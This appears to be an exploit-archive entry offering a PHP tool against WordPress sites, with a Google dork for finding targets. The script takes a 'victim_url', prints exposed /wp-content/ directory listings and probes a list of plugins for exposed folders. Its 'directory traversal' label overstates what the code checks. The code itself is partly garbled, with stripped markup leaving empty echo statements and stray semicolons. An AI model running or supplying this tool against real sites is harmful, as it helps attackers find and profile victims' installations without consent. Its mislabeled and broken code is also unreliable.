# Exploit Title: WordPress ( Directory Traversal )
# Google Dork: inurl:/wp-content/plugins/
# Date: 2025-03-11
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://it.wordpress.org/
# Software Link: https://it.wordpress.org/download/
# Version: 6.7.2
# Tested on: Windows 10
[code]
Wordpress Directory Traversal
';
if(isset($_POST['victim_url'])) {
/* !/wp-content/plugins/! */
$url = $_POST['victim_url'];
if(file_get_contents("$url". "wp-content/plugins/")) {
echo "......................................................................................
";
echo "Directory Traversal on /wp-content/plugins/ Found
";
echo "......................................................................................
";
$see_dir = file_get_contents("$url". "wp-content/plugins/");
echo "";
echo $see_dir;
echo "";
echo "
~Plugins Explorer
$url";
echo "@report vuln";
echo "
";
} else {
echo "You do not have permission to read the directory: /wp-content/plugins/ #Try Direct access";
};
/* !/wp-content/! */
if(file_get_contents("$url". "wp-content/")) {
echo "
......................................................................................
";
echo "Directory Traversal on /wp-content/ Found
";
echo "......................................................................................
";
$see_dir2 = file_get_contents("$url". "wp-content/");
echo "";
echo $see_dir2;
echo "";
} else {
echo "You do not have permission to read the directory: /wp-content/ #Try Direct access";
};;
/* !#Directory Traversal Plugins scanner! */
echo "
~Plugins Scanner
plugins list on: $url(*probable dir traversal)";
$plugins_scann = array( //update me
"duplicator",
"social-warfare",
"revslider",
"work-the-flow-file-upload",
"media-library-assistant",
"masterstudy-lms-learning-management-system",
"masterstudy-lms-learning-management-system-pro",
"ninja-forms",
"backup-backup",
"nex-forms-express-wp-form-builder",
"imagemagick-engine",
"wp-useronline",
"testimonial-slider-and-showcase",
"school-management-system",
"elementor",
"elementor-pro",
);
foreach($plugins_scann as $plugins_scann2) {
if (false!==file("$url/wp-content/plugins/$plugins_scann2/"))
echo "
$plugins_scann2";
else echo "";
};;;
} else {
echo "";
};;;;
?>
[/code]